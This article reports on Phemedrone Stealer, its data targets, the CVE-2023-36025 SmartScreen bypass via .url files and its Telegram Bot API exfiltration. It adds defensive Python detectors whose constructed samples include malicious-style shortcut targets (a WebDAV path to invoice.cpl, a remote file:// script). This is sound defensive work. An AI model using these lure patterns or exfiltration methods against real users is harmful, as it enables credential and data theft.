New malware discovered that can bypass Windows SmartScreen and steal user data
The malware, named Phemedrone Stealer, is a data-harvesting strain that targets a range of file types and application-specific data from popular software, including browsers, file managers, communication platforms and cryptocurrency wallets.
Phemedrone Stealer also collects live details of the compromised Windows 10 or 11 system, including its public IP address and the country, city and postal code associated with it, and takes screenshots while doing so. Trend Micro lists the malware's specific targets as follows:
- Chromium-based browsers: the malware harvests saved passwords, cookies and autofill data from the browser, together with data from password-manager and authenticator extensions such as LastPass, KeePass, NordPass, Google Authenticator, Duo Mobile and Microsoft Authenticator, among many others.
- Cryptocurrency wallets: it extracts wallet files from applications such as Armory, Atomic, Bytecoin, Coinomi, Jaxx, Electrum, Exodus and Guarda.
- Discord: it extracts authentication tokens from the Discord client, which let the attacker access the user's account.
- File grabber: a module that collects user files from specified folders such as Documents and Desktop.
- FileZilla: it captures stored FTP connection details, including credentials, from the application.
- Gecko-based browsers: it targets browsers built on the Gecko engine, of which Firefox is the most widely used, to extract user data.
- System information: it collects detailed system information, including hardware specifications, geographic location and operating-system details, and takes screenshots.
- Steam: it accesses files related to the Steam gaming platform.
- Telegram: it extracts user data from the Telegram installation directory, specifically the authentication-related files in the 'tdata' folder, selecting them by file size and naming pattern; with these files an attacker can reuse the victim's logged-in session.
The attack vector here is a crafted .url (Internet Shortcut) file that downloads and executes malicious scripts while bypassing Windows Defender SmartScreen. The bypass, tracked as CVE-2023-36025, means that a user tricked into opening such a file never sees the SmartScreen warning that a file downloaded from the internet may harm the computer. Once past that check, the malware downloads its payload and establishes persistence on the system.
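A practitioner triaging a suspicious shortcut will want to see what it points at before anything else. The following is an added example, not code from the original article or from Trend Micro: it parses the INI-style .url format ([InternetShortcut] section, URL= key) and applies an assumed heuristic that flags targets which are not ordinary web pages (UNC or file:// paths to remote shares, WebDAV markers, and executable or script file types). The rules and the sample files are constructed for illustration and are not a reproduction of the exact lure used in this campaign; note also that a static check like this cannot see the Mark of the Web on the real file, which is what SmartScreen itself keys on.

```python
"""Static triage of Internet Shortcut (.url) files (added example, assumed heuristic)."""
import configparser
from dataclasses import dataclass, field
from typing import List
from urllib.parse import urlsplit

# File types Windows runs rather than displays (assumed list; extend as needed).
EXECUTABLE_SUFFIXES = (
    ".exe", ".dll", ".cpl", ".scr", ".js", ".jse", ".vbs", ".vbe",
    ".wsf", ".hta", ".bat", ".cmd", ".ps1", ".msi", ".lnk",
)


@dataclass
class UrlVerdict:
    target: str
    findings: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def parse_url_file(text: str) -> str:
    """Return the URL= value of the [InternetShortcut] section, or '' if absent or unparsable."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return ""
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            for key, value in cp[section].items():
                if key.lower() == "url":
                    return value.strip()
    return ""


def assess_target(target: str) -> UrlVerdict:
    """Apply the heuristic rules to a shortcut target and collect findings."""
    verdict = UrlVerdict(target)
    if not target:
        verdict.findings.append("no URL= target found")
        return verdict
    lowered = target.lower()
    if target.startswith("\\\\") or target.startswith("//"):
        # UNC path: Windows fetches the target over SMB or WebDAV, not HTTP.
        verdict.findings.append("UNC path to a remote share")
        path = target
    else:
        parts = urlsplit(target)
        scheme = parts.scheme.lower()
        if scheme == "file":
            verdict.findings.append("file:// target instead of a web page")
            if parts.netloc:
                verdict.findings.append(f"file:// target on remote host {parts.netloc}")
        elif scheme not in ("http", "https"):
            verdict.findings.append(f"unusual URL scheme {scheme!r}")
        path = parts.path
    if "davwwwroot" in lowered or "@ssl" in lowered:
        # Markers of the Windows WebDAV mini-redirector inside a UNC path.
        verdict.findings.append("WebDAV share referenced in target")
    if path.lower().endswith(EXECUTABLE_SUFFIXES):
        verdict.findings.append("target is an executable or script file type")
    return verdict


def triage(text: str) -> UrlVerdict:
    return assess_target(parse_url_file(text))


# Constructed samples for the example (not real campaign artefacts).
SAMPLE_BENIGN = "[InternetShortcut]\nURL=https://www.example.com/docs/index.html\n"
SAMPLE_WEBDAV = (
    "[InternetShortcut]\n"
    "URL=\\\\203.0.113.10@80\\DavWWWRoot\\invoice.cpl\n"
    "IconIndex=3\n"
)
SAMPLE_FILE_REMOTE = "[InternetShortcut]\nURL=file://203.0.113.10/share/update.js\n"

if __name__ == "__main__":
    for name, sample in (("benign", SAMPLE_BENIGN), ("webdav", SAMPLE_WEBDAV),
                         ("file_remote", SAMPLE_FILE_REMOTE)):
        v = triage(sample)
        print(f"{name}: {'SUSPICIOUS' if v.suspicious else 'ok'} {v.target!r} {v.findings}")
```

The heuristic errs on the side of noise: a legitimate https link to an installer ends in .exe and will be flagged too, so treat findings as a reason to look closer rather than as a verdict on their own.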
The search for specific files and data begins immediately afterwards. The malware sends the collected data to the attackers through the Telegram Bot API; Telegram is a popular messaging platform in many countries, so traffic to its API attracts little attention. System information is sent first, followed by a ZIP archive containing all of the collected data.
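The two-step exfiltration pattern just described (a short message first, then an archive, both to the same bot) is something a defender can look for in proxy logs. The code below is an added example, not code from the original article or from Trend Micro. It relies on the documented shape of Telegram Bot API calls (https://api.telegram.org/bot<id>:<secret>/<method>); the log line format, the five-minute pairing window and every sample line are constructed for the example and are not from the campaign.

```python
"""Spot Telegram Bot API exfiltration (sendMessage then sendDocument) in proxy logs. Added example."""
import re
import shlex
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Bot API calls: /bot<numeric id>:<secret>/<method>. Token format is Telegram's; regex is ours.
BOT_CALL = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)")
WINDOW = timedelta(minutes=5)  # assumed: the archive follows the system-info message quickly


@dataclass
class BotEvent:
    ts: datetime
    src: str
    bot_id: str
    method: str


def parse_line(line: str) -> Optional[BotEvent]:
    """Parse one constructed log line: '<iso-ts> <src> <verb> <host> <path> "<user-agent>"'."""
    try:
        fields = shlex.split(line)
    except ValueError:
        return None
    if len(fields) < 6:
        return None
    ts, src, _verb, host, path, _ua = fields[:6]
    if host.lower() != "api.telegram.org":
        return None
    m = BOT_CALL.match(path)
    if m is None:
        return None
    return BotEvent(datetime.fromisoformat(ts), src, m["bot_id"], m["method"])


def find_exfil(lines: List[str]) -> List[Dict[str, str]]:
    """Return one alert per sendMessage followed by sendDocument within WINDOW, per (client, bot)."""
    by_key: Dict[tuple, List[BotEvent]] = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev is not None and ev.method in ("sendMessage", "sendDocument"):
            by_key[(ev.src, ev.bot_id)].append(ev)
    alerts: List[Dict[str, str]] = []
    for (src, bot_id), events in sorted(by_key.items()):
        events.sort(key=lambda e: e.ts)
        pending: Optional[BotEvent] = None
        for ev in events:
            if ev.method == "sendMessage":
                pending = ev
            elif pending is not None and ev.ts - pending.ts <= WINDOW:
                alerts.append({
                    "src": src,
                    "bot_id": bot_id,  # numeric id only; the secret half of the token stays out of alerts
                    "message_at": pending.ts.isoformat(),
                    "document_at": ev.ts.isoformat(),
                })
                pending = None
    return alerts


# Constructed sample log lines (not real traffic). Line 3 is normal Telegram web use;
# lines 4 and 5 are an assumed internal ops bot that sends a message but no document.
SAMPLE_LOG = [
    '2024-01-15T10:02:11 10.0.0.7 POST api.telegram.org /bot6123456789:AAHexampleSecret_1/sendMessage "Mozilla/5.0"',
    '2024-01-15T10:02:14 10.0.0.7 POST api.telegram.org /bot6123456789:AAHexampleSecret_1/sendDocument "Mozilla/5.0"',
    '2024-01-15T10:05:40 10.0.0.9 GET web.telegram.org /k/ "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '2024-01-15T11:30:00 10.0.0.12 POST api.telegram.org /bot4242:opsBotSecret/sendMessage "python-requests/2.31.0"',
    '2024-01-15T11:31:00 10.0.0.12 POST api.telegram.org /bot4242:opsBotSecret/getUpdates "python-requests/2.31.0"',
]

if __name__ == "__main__":
    for alert in find_exfil(SAMPLE_LOG):
        print(alert)
```

In a real deployment, allowlist the bot ids of automation you run yourself and enrich each alert with the originating process from endpoint telemetry; a sendDocument from anything other than a known bot or the Telegram client is worth a ticket on its own.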
The good news is that Microsoft fixed CVE-2023-36025 in its security update of 14 November 2023. Keeping IT systems current by applying security patches promptly matters here: once a fix is released the flaw is no longer a zero-day, but this campaign shows that attackers keep exploiting it on machines that have not installed the update.